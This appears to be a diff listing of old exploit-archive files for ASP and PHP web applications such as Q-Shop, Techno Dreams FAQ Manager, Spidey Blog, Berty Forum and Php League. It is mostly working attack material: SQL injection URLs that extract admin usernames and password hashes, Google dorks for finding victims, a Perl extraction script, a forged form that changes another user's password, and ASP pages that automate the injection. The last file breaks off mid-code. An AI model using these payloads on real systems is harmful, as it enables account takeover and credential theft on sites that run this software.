******************************************************************************* *******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability # Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://quadcomm.com # Script Page : http://quadcomm.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE] ###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example: Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey # ajann,Turkey
# ... # ...
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

56
platforms/asp/webapps/2385.txt
View file

@ -1,28 +1,28 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Dork : faqview.asp?key # Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com # Script Page : http://www.t-dreams.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE] ###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example: Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page: With admin username and password take it,after join to login page:
../[path]/admin/ ../[path]/admin/
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

46
platforms/asp/webapps/2386.txt
View file

@ -1,23 +1,23 @@
******************************************************************************* *******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability # Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://www.t-dreams.com # Script Page : http://www.t-dreams.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE] ###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example: Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18 ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....) Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not [Turkish]Hacker! # Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

36
platforms/asp/webapps/2395.txt
View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability + + Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425 + Download: http://www.aspindir.com/goster/4425
+ Version : 1.0 + Version : 1.0
+ Bug In : uye_profil.asp + Bug In : uye_profil.asp
+ Risk : High + Risk : High
+ Exp. + Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2 http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19] # milw0rm.com [2006-09-19]

22
platforms/asp/webapps/2416.txt
View file

@ -1,11 +1,11 @@
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability # xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir # Author : Muhacir
# Source : http://www.aspindir.com/goster/4386 # Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler # Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :) # Greetz To : str0ke :)
# milw0rm.com [2006-09-22] # milw0rm.com [2006-09-22]

92
platforms/asp/webapps/2421.pl
View file

@ -1,46 +1,46 @@
#!usr/bin/perl #!usr/bin/perl
#Author : gega #Author : gega
#Google : "Spidey Blog Script (c) v1.5" #Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit #SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com #Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org #Powered by e-hack.org
#Vulnerability by Asianeagle. #Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186 #Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple; use LWP::Simple;
print "\n==============================\n"; print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n"; print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n"; print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n"; print "== Author : gega ==\n";
print "==============================\n\n"; print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick')) if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{ {
print "Usage : perl $0 [path] [function]\n"; print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n"; print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n"; print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n"; print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0); exit(0);
} }
else else
{ {
if($ARGV[1] eq 'nick'){ if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201]; $url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n"; print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); } print "[-] Unable to retrieve username\n" if(!$1); }
else { else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201]; $code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!"; $page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n"; print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1); print "[-] Unable to retrieve password\n" if(!$1);
} }
} }
#To Be Or Not To Be! #To Be Or Not To Be!
# milw0rm.com [2006-09-24] # milw0rm.com [2006-09-24]

36
platforms/asp/webapps/2423.txt
View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability + + iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981 Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp Bug In : uye_ayrinti.asp
Risk : High Risk : High
Exp: Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1 http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256 Password encrytped with SHA-256
# milw0rm.com [2006-09-24] # milw0rm.com [2006-09-24]

76
platforms/asp/webapps/2592.htm
View file

@ -1,38 +1,38 @@
<!-- <!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit # Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann # Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2" # Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :) # Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]] [Code]]]
--> -->
<html> <html>
<body bgcolor="#000000"> <body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b> <form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b> <font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br> <input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font> <font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br> <input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer"> <input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer"> <input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42"> <input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p> <input type="hidden" name="Nom" value="Administrateur"></p>
</form> </form>
</body> </body>
</html> </html>
<!-- <!--
[/Code]]] [/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp Next to admin.asp
#ajann,Turkey #ajann,Turkey
#... #...
#Im Not Hacker! #Im Not Hacker!
--> -->
# milw0rm.com [2006-10-18] # milw0rm.com [2006-10-18]

378
platforms/asp/webapps/2642.asp
View file

@ -1,189 +1,189 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit '[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit1.asp '[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ## '[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp '[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'=============================================================================================== '===============================================================================================
%> %>
<html> <html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title> <title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br> Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get"> <form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string1="/index.php?consult=1&indMemo=" string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20" string2="-1%20union select%20"
string3="mdp%20" string3="mdp%20"
string4="from%20" string4="from%20"
string5="membre%20" string5="membre%20"
string6="where%20" string6="where%20"
string7="ind like%20" string7="ind like%20"
string8=Request.Form("id") string8=Request.Form("id")
string9="/index.php?consult=1&indMemo=" string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20" string10="-1%20union select%20"
string11="nom%20" string11="nom%20"
string12="from%20" string12="from%20"
string13="membre%20" string13="membre%20"
string14="where%20" string14="where%20"
string15="ind like%20" string15="ind like%20"
string16=Request.Form("id") string16=Request.Form("id")
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1") Response.Redirect("exploit1.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2") Response.Redirect("exploit1.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3") Response.Redirect("exploit1.asp?islem=hata3")
Else Else
%> %>
<% <%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8 target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16 target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come) Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake With objtake
.Open "GET" , come, FALSE .Open "GET" , come, FALSE
.sEnd .sEnd
take = .Responsetext take = .Responsetext
End With End With
SET objtake = Nothing SET objtake = Nothing
End Function End Function
get_username = take(target1) get_username = take(target1)
get_password = take(target2) get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" ) getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20) username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20) passwd=Mid(get_password,getdata+19,20)
%> %>
<center> <center>
<font face="Verdana" size="2" color="#008000"> <u><b> <font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font> ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td> <b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr> </tr>
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td> <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td> <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr> </tr>
</table> </table>
<form method="POST" name="form2" action="#"> <form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p> <input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form> </form>
</center> </center>
<script language="JavaScript"> <script language="JavaScript">
write() write()
functionControl1() functionControl1()
</script> </script>
</body> </body>
</html> </html>
<% <%
End If End If
End If End If
End If End If
End If End If
Set objtake = Nothing Set objtake = Nothing
%> %>
# milw0rm.com [2006-10-24] # milw0rm.com [2006-10-24]

358
platforms/asp/webapps/2661.asp
View file

@ -1,179 +1,179 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit '[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit2.asp '[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp '[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see" '[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'=============================================================================================== '===============================================================================================
%> %>
<html> <html>
<title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title> <title>Php League v0.82 (classement.php) Remote SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again"); alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
} }
} }
function writetext() { function writetext() {
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>' document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
} }
} }
function write(){ function write(){
setTimeout("writetext()",1000); setTimeout("writetext()",1000);
} }
</script> </script>
</head> </head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000"> <body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center> <center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b> <font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp">Php League</b>v0.82 (classement.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br> Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080"> <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr> <tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td> ID=1]</b></font></td>
<td width="50%"><center> <td width="50%"><center>
<form method="post" name="form1" action="exploit2.asp?islem=get"> <form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080"> <input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td> <input type="submit" value="Get"></center></td>
</tr> </tr>
</table> </table>
<div id=htmlAlani></div> <div id=htmlAlani></div>
<% <%
islem = Request.QueryString("islem") islem = Request.QueryString("islem")
If islem = "hata1" Then If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If End If
If islem = "hata2" Then If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If End If
If islem = "hata3" Then If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>" Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If End If
%> %>
<% <%
If islem = "get" Then If islem = "get" Then
string2="/consult/classement.php?champ='" string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115)," string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58)," string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)" string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85)," string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109)," string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115)," string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)" string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where" string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20" string11="%20id%20like%20"
string12=Request.Form("id") string12=Request.Form("id")
string13="/*" string13="/*"
targettext = Request.Form("text1") targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1) arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1) arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1") Response.Redirect("exploit2.asp?islem=hata1")
Else Else
If arama>0 then If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2") Response.Redirect("exploit2.asp?islem=hata2")
Else Else
If arama2=0 then If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3") Response.Redirect("exploit2.asp?islem=hata3")
Else Else
%> %>
<% <%
